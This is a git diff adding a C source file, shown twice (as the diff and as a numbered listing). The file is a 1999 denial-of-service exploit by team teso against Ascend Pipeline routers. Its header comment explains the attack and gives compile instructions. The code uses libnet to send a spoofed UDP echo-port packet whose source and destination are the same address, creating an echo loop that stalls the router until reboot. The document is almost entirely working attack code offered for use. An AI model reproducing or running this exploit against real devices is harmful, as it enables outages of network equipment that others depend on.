1 files changed, 89 insertions, 0 deletions
diff --git a/exploits/7350ascend/7350ascend-foo.c b/exploits/7350ascend/7350ascend-foo.c
new file mode 100644
index 0000000..8980997
--- /dev/null
+++ b/exploits/7350ascend/7350ascend-foo.c
@@ -0,0 +1,89 @@
+/* ascend foo denial of service exploit
+ * 1999/09/25
+ * 
+ * basically just another lame echo/echo link, but has nice results on ascend,
+ * you can increase the lag in steps of 2ms by sending one packet, after some
+ * few hundret ms lag you overflow the internal packet buffer and the whole
+ * connection stalls, the router has to be rebooted.
+ *
+ * by scut / team teso [http://teso.scene.at/]
+ *
+ * compile with: gcc -o ascend-foo ascend-foo.c -Wall -lnet -DLIBNET_LIL_ENDIAN
+ * works fine against Ascend Pipeline * modells, haven't tried against others
+ */
+#include <stdio.h>
+#include <libnet.h>
+int
+main (int argc, char **argv)
+{
+        int     sock, c;
+        u_long  src_ip;
+        u_char  *buf;
+        u_char  *qbuf;
+        int     qbuf_s = 0;
+        printf ("ascend-foo, udp echo dos attack\nby scut / team teso\n\n");
+        if (argc < 2) {
+                printf ("usage: %s <srcip> [packetsize]\n\n", argv[0]);
+                exit (EXIT_FAILURE);
+        } else if (argc == 2) {
+                qbuf_s = 73;
+        } else {
+                qbuf_s = atoi (argv[2]);
+        }
+        qbuf = malloc (qbuf_s);
+        src_ip  = libnet_name_resolve (argv[1], 0);
+        if (src_ip == 0) {
+                printf ("invalid syntax\n");
+                exit (EXIT_FAILURE);
+        }
+    
+        buf = calloc (1, (UDP_H + IP_H + qbuf_s));
+        if (buf == NULL) {
+                perror ("No memory for packet");
+                exit (EXIT_FAILURE);
+        }
+        libnet_seed_prand ();
+        sock = libnet_open_raw_sock(IPPROTO_RAW);
+                if (sock == -1) {
+                perror ("No socket");
+                exit (EXIT_FAILURE);
+        }
+    
+        libnet_build_ip (       UDP_H + qbuf_s, /* content size */
+                                0,              /* tos */
+                                0,              /* id */
+                                0,              /* frag */
+                                64,             /* ttl */
+                                IPPROTO_UDP,    /* subprotocol */
+                                src_ip,         /* heh ;) */
+                                src_ip,
+                                NULL,           /* payload already there */
+                                0,              /* same */
+                                buf);           /* build in packet buffer */
+        libnet_build_udp (      7,      /* source port */
+                                7,
+                                qbuf,           /* content already there */
+                                qbuf_s,         /* same */
+                                buf + IP_H);    /* build after ip header */
+        libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + qbuf_s);
+        c = libnet_write_ip (sock, buf, UDP_H + IP_H + qbuf_s);
+        if (c < UDP_H + IP_H + qbuf_s) {
+                printf ("write_ip wrote too less bytes\n");
+        }
+        printf ("completed, wrote %d bytes to victim router\n", c);
+        free (buf);
+        return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
+}

diff --git a/exploits/7350ascend/7350ascend-foo.c b/exploits/7350ascend/7350ascend-foo.c new file mode 100644 index 0000000..8980997 --- /dev/null +++ b/exploits/7350ascend/7350ascend-foo.c
@@ -0,0 +1,89 @@
	1	/* ascend foo denial of service exploit
	2	* 1999/09/25
	3	*
	4	* basically just another lame echo/echo link, but has nice results on ascend,
	5	* you can increase the lag in steps of 2ms by sending one packet, after some
	6	* few hundret ms lag you overflow the internal packet buffer and the whole
	7	* connection stalls, the router has to be rebooted.
	8	*
	9	* by scut / team teso [http://teso.scene.at/]
	10	*
	11	* compile with: gcc -o ascend-foo ascend-foo.c -Wall -lnet -DLIBNET_LIL_ENDIAN
	12	* works fine against Ascend Pipeline * modells, haven't tried against others
	13	*/
	14
	15	#include <stdio.h>
	16	#include <libnet.h>
	17
	18	int
	19	main (int argc, char **argv)
	20	{
	21	int sock, c;
	22	u_long src_ip;
	23	u_char *buf;
	24	u_char *qbuf;
	25	int qbuf_s = 0;
	26
	27	printf ("ascend-foo, udp echo dos attack\nby scut / team teso\n\n");
	28	if (argc < 2) {
	29	printf ("usage: %s <srcip> [packetsize]\n\n", argv[0]);
	30	exit (EXIT_FAILURE);
	31	} else if (argc == 2) {
	32	qbuf_s = 73;
	33	} else {
	34	qbuf_s = atoi (argv[2]);
	35	}
	36	qbuf = malloc (qbuf_s);
	37
	38	src_ip = libnet_name_resolve (argv[1], 0);
	39
	40	if (src_ip == 0) {
	41	printf ("invalid syntax\n");
	42	exit (EXIT_FAILURE);
	43	}
	44
	45	buf = calloc (1, (UDP_H + IP_H + qbuf_s));
	46	if (buf == NULL) {
	47	perror ("No memory for packet");
	48	exit (EXIT_FAILURE);
	49	}
	50
	51	libnet_seed_prand ();
	52
	53	sock = libnet_open_raw_sock(IPPROTO_RAW);
	54	if (sock == -1) {
	55	perror ("No socket");
	56	exit (EXIT_FAILURE);
	57	}
	58
	59	libnet_build_ip ( UDP_H + qbuf_s, /* content size */
	60	0, /* tos */
	61	0, /* id */
	62	0, /* frag */
	63	64, /* ttl */
	64	IPPROTO_UDP, /* subprotocol */
	65	src_ip, /* heh ;) */
	66	src_ip,
	67	NULL, /* payload already there */
	68	0, /* same */
	69	buf); /* build in packet buffer */
	70
	71	libnet_build_udp ( 7, /* source port */
	72	7,
	73	qbuf, /* content already there */
	74	qbuf_s, /* same */
	75	buf + IP_H); /* build after ip header */
	76
	77	libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + qbuf_s);
	78
	79	c = libnet_write_ip (sock, buf, UDP_H + IP_H + qbuf_s);
	80	if (c < UDP_H + IP_H + qbuf_s) {
	81	printf ("write_ip wrote too less bytes\n");
	82	}
	83	printf ("completed, wrote %d bytes to victim router\n", c);
	84
	85	free (buf);
	86
	87	return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
	88	}
	89